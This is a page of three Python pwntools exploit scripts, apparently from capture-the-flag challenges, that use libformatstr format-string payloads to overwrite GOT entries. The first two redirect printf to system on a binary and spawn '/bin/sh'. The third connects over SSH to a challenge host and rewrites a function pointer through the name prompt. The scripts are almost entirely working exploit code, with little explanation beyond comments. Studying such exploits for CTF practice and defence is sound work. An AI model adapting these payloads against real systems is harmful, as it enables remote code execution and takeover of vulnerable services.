Пример #1
def pwn_func(io):
	"""Send a libformatstr GOT-rewrite payload for ./pwn2 over `io`.

	Points printf's GOT entry at the PLT stub of system and exit's GOT entry
	at 0x080485EE (annotated as `main` in the original), then sends '/bin/sh'.
	Requires a writable GOT (no full RELRO); the argument index and padding
	are hard-coded to (6, 0) for this particular binary.
	"""
	import libformatstr
	binary = ELF('./pwn2')
	# Index of the printf argument that lands on the format string, and the
	# alignment padding in bytes -- both fixed for ./pwn2.
	arg_index, align = 6, 0
	writer = libformatstr.FormatStr()
	# Overwrite printf.got with system; exit.got is redirected to main.
	writer[binary.got['printf']] = binary.plt['system']
	writer[binary.got['exit']] = 0x080485EE  # main
	# start_len=0: no characters were printed before this payload.
	payload = writer.payload(arg_index, align, start_len=0)
	#log.info('payload:\n %s' % hexdump(payload))

	io.sendline(payload)
	io.recv()
	io.sendline('/bin/sh')
	io.recv()
Пример #2
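# Connect to the challenge service and load the target binary for its
# GOT/PLT addresses.
io = remote('localhost', 8888)
e = ELF('./pwn2')
#libc = ELF('/lib32/libc.so.6')

# libformatstr applies when the format string itself lives on the stack, so
# its "arguments" are controllable too; that is what gives arbitrary
# read/write. The writes below also need a writable GOT (no full RELRO).
# Generate a pattern string to find where the format string sits among the
# arguments (the author's discovery step, left commented out):
#BUF_SZ = 80  # length of the format string buffer
#pat = libformatstr.make_pattern(BUF_SZ)
#io.sendline(pat)
#res = io.recv()
# argnum: index of the argument that lands at the start of the format string
# padding: bytes (0-3) needed to align the arguments
#argnum, padding = libformatstr.guess_argnum(res, BUF_SZ)
#log.info('argnum:%d padding:%d'%(argnum, padding))
# Result for this binary: 6, 0

# Overwrite printf.got with system; exit.got is pointed back at main
# (presumably so the program re-runs instead of exiting).
argnum = 6
padding = 0
p = libformatstr.FormatStr()
p[e.got['printf']] = e.plt['system']
p[e.got['exit']] = 0x080485EE  # main
# start_len=0: no characters were printed before this payload.
fmt_str = p.payload(argnum, padding, start_len=0)
log.info('payload:\n %s' % hexdump(fmt_str))

io.sendline(fmt_str)
io.recv()
io.sendline('/bin/sh')
# Hand the connection to the user exactly once; a second interactive() call
# after the user exits would operate on an already-closed connection.
io.interactive()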
Пример #3
#!/usr/bin/env python3
import libformatstr
from pwn import *

# Local run: spawn ./ttt with TERM set and attach gdb (the endwin breakpoint
# suggests a curses UI); otherwise open an SSH shell on the challenge host
# and launch the binary there.
if not args.LOCAL:
    sess = ssh(user='******', host='challenges2.hexionteam.com', port=3004, password='******')
    io = sess.shell()
    io.recvuntil('~$')
    io.sendline('TERM=xterm ./ttt')
else:
    child_env = dict(os.environ)
    child_env['TERM'] = 'xterm'
    io = process(['./ttt'], env=child_env)
    gdb.attach(io, gdbscript='''
b endwin
c
''')
io.recvuntil('Please enter your name: ')
writer = libformatstr.FormatStr(isx64=True)
# Two-byte little-endian write at 0x603010: DIFFICULTY becomes getchar@0x400e20
# (was IMPOSSIBLE@0x401cd5, per the author's labels).
writer[0x603010] = struct.pack('<H', 0x0e20)
# gdb notes from the original, locating the name buffer on the stack:
# (gdb) b *0x40223e
# (gdb) x/s $rsp + 0x10
# 0x7ffd483d24a0:	"%3608c...
# The name is echoed via "Welcome %s!\n"; start_len=8 presumably accounts
# for the "Welcome " prefix printed before the payload.
name_payload = writer.payload(arg_index=8, start_len=8)
io.sendline(name_payload)
io.recvuntil('Press ENTER to begin.')
io.sendline()
# 1000 random movement keys followed by 'q': mixed inputs and DIFFICULTY() results.
io.send(''.join(random.choices('wasd ', k=1000)) + 'q')
io.interactive()